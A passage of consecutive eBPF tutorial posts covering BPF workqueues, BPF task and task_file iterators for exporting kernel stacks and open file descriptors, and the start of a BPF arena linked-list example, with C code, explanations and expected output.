/* Userspace test for BPF workqueue */
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <bpf/libbpf.h>
#include "wq_simple.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
    return vfprintf(stderr, format, args);
}

int main(int argc, char **argv)
{
    struct wq_simple_bpf *skel;
    int err, fd;

    libbpf_set_print(libbpf_print_fn);

    /* Open and load BPF application */
    skel = wq_simple_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to open and load BPF skeleton\n");
        return 1;
    }

    /* Attach tracepoint handler */
    err = wq_simple_bpf__attach(skel);
    if (err) {
        fprintf(stderr, "Failed to attach BPF skeleton\n");
        goto cleanup;
    }

    printf("BPF workqueue program attached. Triggering unlink syscall...\n");

    /* Create a temporary file to trigger do_unlinkat */
    fd = open("/tmp/wq_test_file", O_CREAT | O_WRONLY, 0644);
    if (fd >= 0) {
        close(fd);
        unlink("/tmp/wq_test_file");
    }

    /* Give workqueue time to execute */
    sleep(1);

    /* Check results */
    printf("\nResults:\n");
    printf("  main_executed = %u (expected: 1)\n", skel->bss->main_executed);
    printf("  wq_executed = %u (expected: 1)\n", skel->bss->wq_executed);

    if (skel->bss->main_executed == 1 && skel->bss->wq_executed == 1) {
        printf("\n✓ Test PASSED!\n");
    } else {
        printf("\n✗ Test FAILED!\n");
        err = 1;
    }

cleanup:
    wq_simple_bpf__destroy(skel);
    return err;
}

Understanding the User-Space Code

The userspace program orchestrates the test and verifies results. We use the skeleton API from libbpf which embeds the compiled BPF bytecode in a C structure, making loading trivial. The wq_simple_bpf__open_and_load() call compiles (if needed), loads the BPF program into the kernel, and creates all maps in one operation.

After loading, wq_simple_bpf__attach() attaches the fentry program to do_unlinkat. From this point, any unlink syscall will trigger our BPF program. We deliberately trigger this by creating and immediately deleting a temporary file. The open() creates /tmp/wq_test_file, we close the fd, then unlink() deletes it. This deletion enters the kernel's do_unlinkat function, triggering our fentry probe.

Here's the critical timing aspect: workqueue execution is asynchronous. Our main BPF program schedules the work and returns immediately. The kernel queues the callback for later execution by a kernel worker thread. This is why we sleep(1) - giving the workqueue time to execute before we check results. In production code, you'd use more sophisticated synchronization, but for a simple test, sleep is sufficient.

After the sleep, we read global variables from the BPF program's .bss section. The skeleton provides convenient access through skel->bss->main_executed and skel->bss->wq_executed. If both are 1, we know the synchronous path (fentry) and async path (workqueue callback) both executed successfully.

Understanding Workqueue APIs

The workqueue API consists of three essential functions that manage the lifecycle. bpf_wq_init(wq, map, flags) initializes a workqueue handle, establishing the relationship between the workqueue and its containing map. The map parameter is crucial - it tells the verifier which map contains the value with the embedded bpf_wq structure. The verifier uses this to ensure memory safety across async execution. Flags should be 0 in current kernels.

bpf_wq_set_callback(wq, callback_fn, flags) registers the function to execute asynchronously. The callback must have the signature int callback(void *map, int *key, void *value). The verifier checks this signature at load time and will reject programs with mismatched signatures. This type safety prevents common async programming errors. Flags should be 0.

bpf_wq_start(wq, flags) schedules the workqueue to run. This returns immediately - your BPF program continues executing synchronously. The kernel queues the callback for execution by a worker thread in process context at some point in the future. The callback might run microseconds or milliseconds later depending on system load. Flags should be 0.

The callback signature deserves attention. Unlike bpf_timer callbacks which receive (void *map, __u32 *key, void *value), workqueue callbacks receive (void *map, int *key, void *value). Note the key type difference - int * vs __u32 *. This reflects the evolution of the API and must be matched exactly or the verifier rejects your program. The callback runs in process context, so it can safely perform operations that would crash in softirq context.

When to Use Workqueues vs Timers

Choose bpf_timer when you need microsecond-precision timing, operations are fast and non-blocking, you're updating counters or simple state, or implementing periodic fast-path operations like statistics collection or packet pacing. Timers excel at time-critical tasks that must execute with minimal latency.

Choose bpf_wq when you need to sleep or wait, allocate memory with kzalloc(), perform device or network I/O, or defer cleanup operations that can happen later. Workqueues are perfect for the "fast path + slow path" pattern where critical operations happen immediately and expensive processing runs asynchronously. Examples include HID device I/O (keyboard macro injection with delays), async map cleanup (preventing memory leaks), security policy updates (querying external databases), and background processing (compression, encryption, aggregation).

The fundamental trade-off is latency vs capability. Timers have lower latency but restricted capabilities. Workqueues have higher latency but full process context capabilities including sleeping and blocking I/O.

Compilation and Execution

Navigate to the bpf_wq directory and build:

cd bpf-developer-tutorial/src/features/bpf_wq
make

The Makefile compiles the BPF program with the experimental workqueue features enabled and generates a skeleton header.

Run the simple workqueue test:

sudo ./wq_simple

Expected output:

BPF workqueue program attached. Triggering unlink syscall...

Results:
  main_executed = 1 (expected: 1)
  wq_executed = 1 (expected: 1)

✓ Test PASSED!

The test verifies that both the synchronous fentry probe and the asynchronous workqueue callback executed successfully. If the workqueue callback didn't run, wq_executed would be 0 and the test would fail.

Historical Timeline and Context

Understanding how workqueues came to exist helps appreciate their design. In 2022, Benjamin Tissoires started work on HID-BPF, aiming to let users fix broken HID devices without kernel drivers. By 2023, he realized bpf_timer limitations made HID device I/O impossible - you can't wait for hardware responses in softirq context. In early 2024, he proposed bpf_wq as "bpf_timer in process context," collaborating with the BPF community on the design. The kernel merged workqueues in April 2024 as part of Linux v6.10. Since then, they've been used for HID quirks, rate limiting, async cleanup, and other sleepable operations.

The key quote from Benjamin's patches captures the motivation perfectly: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."

This real-world need drove the design. Workqueues exist because device handling and resource management require sleepable, blocking operations that timers fundamentally cannot provide.

Summary and Next Steps

BPF workqueues solve a fundamental limitation of eBPF by enabling sleepable, blocking operations in process context. Created specifically to support HID device handling where timing delays and device I/O are essential, workqueues unlock powerful new capabilities for eBPF programs. They enable the "fast path + slow path" pattern where performance-critical operations execute immediately while expensive cleanup and I/O happen asynchronously without blocking.

Our simple example demonstrates the core workqueue lifecycle: embedding a bpf_wq in a map value, initializing and configuring it, scheduling async execution, and verifying the callback runs in process context. This same pattern scales to production use cases like network rate limiting with async cleanup, security monitoring with external service queries, and device handling with I/O operations.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Original Kernel Patches: Benjamin Tissoires' HID-BPF and bpf_wq patches (2023-2024)
Linux Kernel Source: kernel/bpf/helpers.c - workqueue implementation
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq

Example adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 6.10+ for workqueue support. Complete source code available in the tutorial repository.

eBPF Tutorial: BPF Iterators for Kernel Data Export

云微 — Tue, 13 Jan 2026 07:18:49 +0000

Ever tried monitoring hundreds of processes and ended up parsing thousands of /proc files just to find the few you care about? Or needed custom formatted kernel data but didn't want to modify the kernel itself? Traditional /proc filesystem access is slow, inflexible, and forces you to process tons of data in userspace even when you only need a small filtered subset.

This is what BPF Iterators solve. Introduced in Linux kernel 5.8, iterators let you traverse kernel data structures directly from BPF programs, apply filters in-kernel, and output exactly the data you need in any format you want. In this tutorial, we'll build a dual-mode iterator that shows kernel stack traces and open file descriptors for processes, with in-kernel filtering by process name - dramatically faster than parsing /proc.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters

Introduction to BPF Iterators: The /proc Replacement

The Problem: /proc is Slow and Rigid

Traditional Linux monitoring revolves around the /proc filesystem. Need to see what processes are doing? Read /proc/*/stack. Want open files? Parse /proc/*/fd/*. This works, but it's painfully inefficient when you're monitoring systems at scale or need specific filtered views of kernel data.

The performance problem is systemic. Every /proc access requires a syscall, kernel mode transition, text formatting, data copy to userspace, and then you parse that text back into structures. If you want stack traces for all "bash" processes among 1000 total processes, you still read all 1000 /proc/*/stack files and filter in userspace. That's 1000 syscalls, 1000 text parsing operations, and megabytes of data transferred just to find a handful of matches.

Format inflexibility compounds the problem. The kernel chooses what data to show and how to format it. Want stack traces with custom annotations? Too bad, you get the kernel's fixed format. Need to aggregate data across processes? Parse everything in userspace. The /proc interface is designed for human consumption, not programmatic filtering and analysis.

Here's what traditional monitoring looks like:

# Find stack traces for all bash processes
for pid in $(pgrep bash); do
  echo "=== PID $pid ==="
  cat /proc/$pid/stack
done

This spawns pgrep as a subprocess, makes a syscall per matching PID to read stack files, parses text output, and does all filtering in userspace. Simple to write, horrible for performance.

The Solution: Programmable In-Kernel Iteration

BPF iterators flip the model. Instead of pulling all data to userspace for processing, you push your processing logic into the kernel where the data lives. An iterator is a BPF program attached to a kernel data structure traversal that gets called for each element. The kernel walks tasks, files, or sockets, invokes your BPF program with each element's context, and your code decides what to output and how to format it.

The architecture is elegant. You write a BPF program marked SEC("iter/task") or SEC("iter/task_file") that receives each task or file during iteration. Inside this program, you have direct access to kernel struct fields, can filter based on any criteria using normal C logic, and use BPF_SEQ_PRINTF() to format output exactly as needed. The kernel handles the iteration mechanics while your code focuses purely on filtering and formatting.

When userspace reads from the iterator file descriptor, the magic happens entirely in the kernel. The kernel walks the task list, calls your BPF program for each task passing the task_struct pointer. Your program checks if the task name matches your filter - if not, it returns 0 immediately with no output. If it matches, your program extracts the stack trace and formats it to a seq_file. All this happens in kernel context before any data crosses to userspace.

The benefits are transformative. In-kernel filtering means only relevant data crosses the kernel boundary, eliminating wasted work. Custom formats let you output binary, JSON, CSV, whatever your tools need. Single read operation replaces thousands of individual /proc file accesses. Zero parsing because you formatted the data correctly in the kernel. Composability works with standard Unix tools since iterator output comes through a normal file descriptor.

Iterator Types and Capabilities

The kernel provides iterators for many subsystems. Task iterators (iter/task) walk all tasks giving you access to process state, credentials, resource usage, and parent-child relationships. File iterators (iter/task_file) traverse open file descriptors showing files, sockets, pipes, and other fd types. Network iterators (iter/tcp, iter/udp) walk active network connections with full socket state. BPF object iterators (iter/bpf_map, iter/bpf_prog) enumerate loaded BPF programs and maps for introspection.

Our tutorial focuses on task and task_file iterators because they solve common monitoring needs and demonstrate core concepts applicable to all iterator types.

Implementation: Dual-Mode Task Iterator

Let's build a complete example demonstrating two iterator types in one tool. We'll create a program that can show either kernel stack traces or open file descriptors for processes, with optional filtering by process name.

Complete BPF Program: task_stack.bpf.c

// SPDX-License-Identifier: GPL-2.0
/* Kernel task stack and file descriptor iterator */
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>

char _license[] SEC("license") = "GPL";

#define MAX_STACK_TRACE_DEPTH   64
unsigned long entries[MAX_STACK_TRACE_DEPTH] = {};
#define SIZE_OF_ULONG (sizeof(unsigned long))

/* Filter: only show stacks for tasks with this name (empty = show all) */
char target_comm[16] = "";
__u32 stacks_shown = 0;
__u32 files_shown = 0;

/* Task stack iterator */
SEC("iter/task")
int dump_task_stack(struct bpf_iter__task *ctx)
{
    struct seq_file *seq = ctx->meta->seq;
    struct task_struct *task = ctx->task;
    long i, retlen;
    int match = 1;

    if (task == (void *)0) {
        /* End of iteration - print summary */
        if (stacks_shown > 0) {
            BPF_SEQ_PRINTF(seq, "\n=== Summary: %u task stacks shown ===\n",
                       stacks_shown);
        }
        return 0;
    }

    /* Filter by task name if specified */
    if (target_comm[0] != '\0') {
        match = 0;
        for (i = 0; i < 16; i++) {
            if (task->comm[i] != target_comm[i])
                break;
            if (task->comm[i] == '\0') {
                match = 1;
                break;
            }
        }
        if (!match)
            return 0;
    }

    /* Get kernel stack trace for this task */
    retlen = bpf_get_task_stack(task, entries,
                    MAX_STACK_TRACE_DEPTH * SIZE_OF_ULONG, 0);
    if (retlen < 0)
        return 0;

    stacks_shown++;

    /* Print task info and stack trace */
    BPF_SEQ_PRINTF(seq, "=== Task: %s (pid=%u, tgid=%u) ===\n",
               task->comm, task->pid, task->tgid);
    BPF_SEQ_PRINTF(seq, "Stack depth: %u frames\n", retlen / SIZE_OF_ULONG);

    for (i = 0; i < MAX_STACK_TRACE_DEPTH; i++) {
        if (retlen > i * SIZE_OF_ULONG)
            BPF_SEQ_PRINTF(seq, "  [%2ld] %pB\n", i, (void *)entries[i]);
    }
    BPF_SEQ_PRINTF(seq, "\n");

    return 0;
}

/* Task file descriptor iterator */
SEC("iter/task_file")
int dump_task_file(struct bpf_iter__task_file *ctx)
{
    struct seq_file *seq = ctx->meta->seq;
    struct task_struct *task = ctx->task;
    struct file *file = ctx->file;
    __u32 fd = ctx->fd;
    long i;
    int match = 1;

    if (task == (void *)0 || file == (void *)0) {
        if (files_shown > 0 && ctx->meta->seq_num > 0) {
            BPF_SEQ_PRINTF(seq, "\n=== Summary: %u file descriptors shown ===\n",
                       files_shown);
        }
        return 0;
    }

    /* Filter by task name if specified */
    if (target_comm[0] != '\0') {
        match = 0;
        for (i = 0; i < 16; i++) {
            if (task->comm[i] != target_comm[i])
                break;
            if (task->comm[i] == '\0') {
                match = 1;
                break;
            }
        }
        if (!match)
            return 0;
    }

    if (ctx->meta->seq_num == 0) {
        BPF_SEQ_PRINTF(seq, "%-16s %8s %8s %6s %s\n",
                   "COMM", "TGID", "PID", "FD", "FILE_OPS");
    }

    files_shown++;

    BPF_SEQ_PRINTF(seq, "%-16s %8d %8d %6d 0x%lx\n",
               task->comm, task->tgid, task->pid, fd,
               (long)file->f_op);

    return 0;
}

Understanding the BPF Code

The program implements two separate iterators sharing common filtering logic. The SEC("iter/task") annotation registers dump_task_stack as a task iterator - the kernel will call this function once for each task in the system. The context structure bpf_iter__task provides three critical pieces: the meta field containing iteration metadata and the seq_file for output, the task pointer to the current task_struct, and a NULL task pointer when iteration finishes so you can print summaries.

The task stack iterator shows in-kernel filtering in action. When task is NULL, we've reached the end of iteration and can print summary statistics showing how many tasks matched our filter. For each task, we first apply filtering by comparing task->comm (the process name) against target_comm. We can't use standard library functions like strcmp() in BPF, so we manually loop through characters comparing byte by byte. If the names don't match and filtering is enabled, we immediately return 0 with no output - this task is skipped entirely in the kernel without crossing to userspace.

Once a task passes filtering, we extract its kernel stack trace using bpf_get_task_stack(). This BPF helper captures up to 64 stack frames into our entries array, returning the number of bytes written. We format the output using BPF_SEQ_PRINTF() which writes to the kernel's seq_file infrastructure. The special %pB format specifier symbolizes kernel addresses, turning raw pointers into human-readable function names like schedule+0x42/0x100. This makes stack traces immediately useful for debugging.

The file descriptor iterator demonstrates a different iterator type. SEC("iter/task_file") tells the kernel to call this function for every open file descriptor across all tasks. The context provides task, file (the kernel's struct file pointer), and fd (the numeric file descriptor). We apply the same task name filtering, then format output as a table. Using ctx->meta->seq_num to detect the first output lets us print column headers exactly once.

Notice how filtering happens before any expensive operations. We check the task name first, and only if it matches do we extract stack traces or format file information. This minimizes work in the kernel fast path - non-matching tasks are rejected with just a string comparison, no memory allocation, no formatting, no output.

Complete User-Space Program: task_stack.c

// SPDX-License-Identifier: GPL-2.0
/* Userspace program for task stack and file iterator */
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>
#include "task_stack.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
    return vfprintf(stderr, format, args);
}

static void run_iterator(const char *name, struct bpf_program *prog)
{
    struct bpf_link *link;
    int iter_fd, len;
    char buf[8192];

    link = bpf_program__attach_iter(prog, NULL);
    if (!link) {
        fprintf(stderr, "Failed to attach %s iterator\n", name);
        return;
    }

    iter_fd = bpf_iter_create(bpf_link__fd(link));
    if (iter_fd < 0) {
        fprintf(stderr, "Failed to create %s iterator: %d\n", name, iter_fd);
        bpf_link__destroy(link);
        return;
    }

    while ((len = read(iter_fd, buf, sizeof(buf) - 1)) > 0) {
        buf[len] = '\0';
        printf("%s", buf);
    }

    close(iter_fd);
    bpf_link__destroy(link);
}

int main(int argc, char **argv)
{
    struct task_stack_bpf *skel;
    int err;
    int show_files = 0;

    libbpf_set_print(libbpf_print_fn);

    /* Parse arguments */
    if (argc > 1 && strcmp(argv[1], "--files") == 0) {
        show_files = 1;
        argc--;
        argv++;
    }

    /* Open BPF application */
    skel = task_stack_bpf__open();
    if (!skel) {
        fprintf(stderr, "Failed to open BPF skeleton\n");
        return 1;
    }

    /* Configure filter before loading */
    if (argc > 1) {
        strncpy(skel->bss->target_comm, argv[1], sizeof(skel->bss->target_comm) - 1);
        printf("Filtering for tasks matching: %s\n\n", argv[1]);
    } else {
        printf("Usage: %s [--files] [comm]\n", argv[0]);
        printf("  --files    Show open file descriptors instead of stacks\n");
        printf("  comm       Filter by process name\n\n");
    }

    /* Load BPF program */
    err = task_stack_bpf__load(skel);
    if (err) {
        fprintf(stderr, "Failed to load BPF skeleton\n");
        goto cleanup;
    }

    if (show_files) {
        printf("=== BPF Task File Descriptor Iterator ===\n\n");
        run_iterator("task_file", skel->progs.dump_task_file);
    } else {
        printf("=== BPF Task Stack Iterator ===\n\n");
        run_iterator("task", skel->progs.dump_task_stack);
    }

cleanup:
    task_stack_bpf__destroy(skel);
    return err;
}

Understanding the User-Space Code

The userspace program showcases how simple iterator usage is once you understand the pattern. The run_iterator() function encapsulates the three-step iterator lifecycle. First, bpf_program__attach_iter() attaches the BPF program to the iterator infrastructure, registering it to be called during iteration. Second, bpf_iter_create() creates a file descriptor representing an iterator instance. Third, simple read() calls consume the iterator output.

Here's what makes this powerful: when you read from the iterator fd, the kernel transparently starts walking tasks or files. For each element, it calls your BPF program passing the element's context. Your BPF code filters and formats output to a seq_file buffer. The kernel accumulates this output and returns it through the read() call. From userspace's perspective, it's just reading a file - all the iteration, filtering, and formatting complexity is hidden in the kernel.

The main function handles mode selection and configuration. We parse command-line arguments to determine whether to show stacks or files, and what process name to filter for. Critically, we set skel->bss->target_comm before loading the BPF program. This writes the filter string into the BPF program's global data section, making it visible to kernel code when the program runs. This is how we pass configuration from userspace to kernel without complex communication channels.

After loading, we select which iterator to run based on the --files flag. Both iterators use the same filtering logic, but produce different output - one shows stack traces, the other shows file descriptors. The shared filtering code demonstrates how BPF programs can implement reusable logic across different iterator types.

Compilation and Execution

Navigate to the bpf_iters directory and build:

cd bpf-developer-tutorial/src/features/bpf_iters
make

The Makefile compiles the BPF program with BTF support and generates a skeleton header containing the compiled bytecode embedded in C structures. This skeleton API makes BPF program loading trivial.

Show kernel stack traces for all systemd processes:

sudo ./task_stack systemd

Expected output:

Filtering for tasks matching: systemd

=== BPF Task Stack Iterator ===

=== Task: systemd (pid=1, tgid=1) ===
Stack depth: 6 frames
  [ 0] ep_poll+0x447/0x460
  [ 1] do_epoll_wait+0xc3/0xe0
  [ 2] __x64_sys_epoll_wait+0x6d/0x110
  [ 3] x64_sys_call+0x19b1/0x2310
  [ 4] do_syscall_64+0x7e/0x170
  [ 5] entry_SYSCALL_64_after_hwframe+0x76/0x7e

=== Summary: 1 task stacks shown ===

Show open file descriptors for bash processes:

sudo ./task_stack --files bash

Expected output:

Filtering for tasks matching: bash

=== BPF Task File Descriptor Iterator ===

COMM                 TGID      PID     FD FILE_OPS
bash                12345    12345      0 0xffffffff81e3c6e0
bash                12345    12345      1 0xffffffff81e3c6e0
bash                12345    12345      2 0xffffffff81e3c6e0
bash                12345    12345    255 0xffffffff82145dc0

=== Summary: 4 file descriptors shown ===

Run without filtering to see all tasks:

sudo ./task_stack

This shows stacks for every task in the system. On a typical desktop, this might display hundreds of tasks. Notice how fast it runs compared to parsing /proc/*/stack for all processes - the iterator is dramatically more efficient.

When to Use BPF Iterators vs /proc

Choose BPF iterators when you need filtered kernel data without userspace processing overhead, custom output formats that don't match /proc text, performance-critical monitoring that runs frequently, or integration with BPF-based observability infrastructure. Iterators excel when you're monitoring many entities but only care about a subset, or when you need to aggregate and transform data in the kernel.

Choose /proc when you need simple one-off queries, are debugging or prototyping where development speed matters more than runtime performance, want maximum portability across kernel versions (iterators require relatively recent kernels), or run in restricted environments where you can't load BPF programs.

The fundamental trade-off is processing location. Iterators push filtering and formatting into the kernel for efficiency and flexibility, while /proc keeps the kernel simple and does all processing in userspace. For production monitoring of complex systems, iterators usually win due to their performance benefits and programming flexibility.

Summary and Next Steps

BPF iterators revolutionize how we export kernel data by enabling programmable, filtered iteration directly from BPF code. Instead of repeatedly reading and parsing /proc files, you write a BPF program that iterates kernel structures in-kernel, applies filtering at the source, and formats output exactly as needed. This eliminates massive overhead from syscalls, mode transitions, and userspace parsing while providing complete flexibility in output format.

Our dual-mode iterator demonstrates both task and file iteration, showing how one BPF program can export multiple views of kernel data with shared filtering logic. The kernel handles complex iteration mechanics while your BPF code focuses purely on filtering and formatting. Iterators integrate seamlessly with standard Unix tools through their file descriptor interface, making them composable building blocks for sophisticated monitoring pipelines.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

BPF Iterator Documentation: https://docs.kernel.org/bpf/bpf_iterators.html
Kernel Iterator Selftests: Linux kernel tree tools/testing/selftests/bpf/*iter*.c
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters
libbpf Iterator API: https://github.com/libbpf/libbpf
BPF Helpers Manual: https://man7.org/linux/man-pages/man7/bpf-helpers.7.html

Examples adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 5.8+ for iterator support, BTF enabled, and libbpf. Complete source code available in the tutorial repository.

eBPF Tutorial by Example: BPF Arena for Zero-Copy Shared Memory

云微 — Tue, 06 Jan 2026 07:19:17 +0000

Ever tried building a linked list in eBPF and got stuck using awkward integer indices instead of real pointers? Or needed to share large amounts of data between your kernel BPF program and userspace without expensive syscalls? Traditional BPF maps force you to work around pointer limitations and require system calls for every access. What if you could just use normal C pointers and have direct memory access from both kernel and userspace?

This is what BPF Arena solves. Created by Alexei Starovoitov in 2024, arena provides a sparse shared memory region where BPF programs can use real pointers to build complex data structures like linked lists, trees, and graphs, while userspace gets zero-copy direct access to the same memory. In this tutorial, we'll build a linked list in arena memory and show you how both kernel and userspace can manipulate it using standard pointer operations.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena

Introduction to BPF Arena: Breaking Free from Map Limitations

The Problem: When BPF Maps Aren't Enough

Traditional BPF maps are fantastic for simple key-value storage, but they have fundamental limitations when you need complex data structures or large-scale data sharing. Let's look at what developers faced before arena existed.

Ring buffers only work in one direction - BPF can send data to userspace, but userspace can't write back. They're streaming-only, no random access. Hash and array maps require syscalls like bpf_map_lookup_elem() for every access from userspace. Array maps allocate all their memory upfront, wasting space if you only use a fraction of entries. Most critically, you can't use real pointers - you're forced to use integer indices to link data structures together.

Building a linked list the old way looked like this mess:

struct node {
    int next_idx;  // Can't use pointers, must use index!
    int data;
};

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 10000);
    __type(value, struct node);
} nodes_map SEC(".maps");

// Traverse requires repeated map lookups
int idx = head_idx;
while (idx != -1) {
    struct node *n = bpf_map_lookup_elem(&nodes_map, &idx);
    if (!n) break;
    process(n->data);
    idx = n->next_idx;  // No pointer following!
}

Every node access requires a map lookup. You can't just follow pointers like normal C code. The verifier won't let you use pointers across different map entries. This makes implementing trees, graphs, or any pointer-based structure incredibly awkward and slow.

The Solution: Sparse Shared Memory with Real Pointers

In 2024, Alexei Starovoitov from the Linux kernel team introduced BPF arena to solve these limitations. Arena provides a sparse shared memory region between BPF programs and userspace, supporting up to 4GB of address space. Memory pages are allocated on-demand as you use them, so you don't waste space. Both kernel BPF code and userspace programs can map the same arena and access it directly.

The game-changer: you can use real C pointers in BPF programs targeting arena memory. The __arena annotation tells the verifier that these pointers reference arena space, and special address space casts (cast_kern(), cast_user()) let you safely convert between kernel and userspace views of the same memory. Userspace gets zero-copy access through mmap() - no syscalls needed to read or write arena data.

Here's what the same linked list looks like with arena:

struct node __arena {
    struct node __arena *next;  // Real pointer!
    int data;
};

struct node __arena *head;

// Traverse with normal pointer following
struct node __arena *n = head;
while (n) {
    process(n->data);
    n = n->next;  // Just follow the pointer!
}

Clean, simple, exactly how you'd write it in normal C. The verifier understands arena pointers and lets you dereference them safely.

Why This Matters

Arena was inspired by research showing the potential for complex data structures in BPF. Before arena, developers were building hash tables, queues, and trees using giant BPF array maps with integer indices instead of pointers. It worked, but the code was ugly and slow. Arena unlocks several powerful use cases.

In-kernel data structures become practical. You can implement custom hash tables with collision chaining, AVL or red-black trees for sorted data, graphs for network topology mapping, all using normal pointer operations. Key-value store accelerators can run in the kernel for maximum performance, with userspace getting direct access to the data structure without syscall overhead. Bidirectional communication works naturally - both kernel and userspace can modify shared data structures using lock-free algorithms. Large data aggregation scales up to 4GB instead of being limited by typical map size constraints.

Implementation: Building a Linked List in Arena Memory

Let's build a complete example that demonstrates arena's power. We'll create a linked list where BPF programs add and delete elements using real pointers, while userspace directly accesses the list to compute sums without any syscalls.

Complete BPF Program: arena_list.bpf.c

// SPDX-License-Identifier: GPL-2.0
/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */
#define BPF_NO_KFUNC_PROTOTYPES
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "bpf_experimental.h"

struct {
    __uint(type, BPF_MAP_TYPE_ARENA);
    __uint(map_flags, BPF_F_MMAPABLE);
    __uint(max_entries, 100); /* number of pages */
#ifdef __TARGET_ARCH_arm64
    __ulong(map_extra, 0x1ull << 32); /* start of mmap() region */
#else
    __ulong(map_extra, 0x1ull << 44); /* start of mmap() region */
#endif
} arena SEC(".maps");

#include "bpf_arena_alloc.h"
#include "bpf_arena_list.h"

struct elem {
    struct arena_list_node node;
    __u64 value;
};

struct arena_list_head __arena *list_head;
int list_sum;
int cnt;
bool skip = false;

#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
long __arena arena_sum;
int __arena test_val = 1;
struct arena_list_head __arena global_head;
#else
long arena_sum SEC(".addr_space.1");
int test_val SEC(".addr_space.1");
#endif

int zero;

SEC("syscall")
int arena_list_add(void *ctx)
{
#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
    __u64 i;

    list_head = &global_head;

    for (i = zero; i < cnt && can_loop; i++) {
        struct elem __arena *n = bpf_alloc(sizeof(*n));

        test_val++;
        n->value = i;
        arena_sum += i;
        list_add_head(&n->node, list_head);
    }
#else
    skip = true;
#endif
    return 0;
}

SEC("syscall")
int arena_list_del(void *ctx)
{
#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
    struct elem __arena *n;
    int sum = 0;

    arena_sum = 0;
    list_for_each_entry(n, list_head, node) {
        sum += n->value;
        arena_sum += n->value;
        list_del(&n->node);
        bpf_free(n);
    }
    list_sum = sum;
#else
    skip = true;
#endif
    return 0;
}

char _license[] SEC("license") = "GPL";

Understanding the BPF Code

The program starts by defining the arena map itself. BPF_MAP_TYPE_ARENA tells the kernel this is arena memory, and BPF_F_MMAPABLE makes it accessible via mmap() from userspace. The max_entries field specifies how many pages (typically 4KB each) the arena can hold - here we allow up to 100 pages, or about 400KB. The map_extra field sets where in the virtual address space the arena gets mapped, using different addresses for ARM64 vs x86-64 to avoid conflicts with existing mappings.

After defining the map, we include arena helpers. The bpf_arena_alloc.h file provides bpf_alloc() and bpf_free() functions - a simple memory allocator that works with arena pages, similar to malloc() and free() but specifically for arena memory. The bpf_arena_list.h file implements doubly-linked list operations using arena pointers, including list_add_head() to prepend nodes and list_for_each_entry() to iterate safely.

Our elem structure contains the actual data. The arena_list_node member provides the next and pprev pointers for linking nodes together - these are arena pointers marked with __arena. The value field holds our payload data. Notice the __arena annotation on list_head - this tells the verifier this pointer references arena memory, not normal kernel memory.

The arena_list_add() function creates list elements. It's marked SEC("syscall") because userspace will trigger it using bpf_prog_test_run(). The loop allocates new elements using bpf_alloc(sizeof(*n)), which returns an arena pointer. We can then dereference n->value directly - the verifier allows this because n is an arena pointer. The list_add_head() call prepends the new node to the list using normal pointer manipulation, all happening in arena memory. The can_loop check satisfies the verifier's bounded loop requirement.

The arena_list_del() function demonstrates iteration and cleanup. The list_for_each_entry() macro walks the list following arena pointers. Inside the loop, we sum values and delete nodes. The bpf_free(n) call returns memory to the arena allocator, decreasing the reference count and potentially freeing pages when the count hits zero.

The address space cast feature is crucial. Some compilers support __BPF_FEATURE_ADDR_SPACE_CAST which enables the __arena annotation to work as a compiler address space. Without this support, we fall back to using explicit section annotations like SEC(".addr_space.1"). The code checks for this feature and skips execution if it's not available, preventing runtime errors.

Complete User-Space Program: arena_list.c

// SPDX-License-Identifier: GPL-2.0
/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>

#include "bpf_arena_list.h"
#include "arena_list.skel.h"

struct elem {
    struct arena_list_node node;
    uint64_t value;
};

static int list_sum(struct arena_list_head *head)
{
    struct elem __arena *n;
    int sum = 0;

    list_for_each_entry(n, head, node)
        sum += n->value;
    return sum;
}

static void test_arena_list_add_del(int cnt)
{
    LIBBPF_OPTS(bpf_test_run_opts, opts);
    struct arena_list_bpf *skel;
    int expected_sum = (u_int64_t)cnt * (cnt - 1) / 2;
    int ret, sum;

    skel = arena_list_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to open and load BPF skeleton\n");
        return;
    }

    skel->bss->cnt = cnt;
    ret = bpf_prog_test_run_opts(bpf_program__fd(skel->progs.arena_list_add), &opts);
    if (ret != 0) {
        fprintf(stderr, "Failed to run arena_list_add: %d\n", ret);
        goto out;
    }
    if (opts.retval != 0) {
        fprintf(stderr, "arena_list_add returned %d\n", opts.retval);
        goto out;
    }
    if (skel->bss->skip) {
        printf("SKIP: compiler doesn't support arena_cast\n");
        goto out;
    }
    sum = list_sum(skel->bss->list_head);
    printf("Sum of elements: %d (expected: %d)\n", sum, expected_sum);

    ret = bpf_prog_test_run_opts(bpf_program__fd(skel->progs.arena_list_del), &opts);
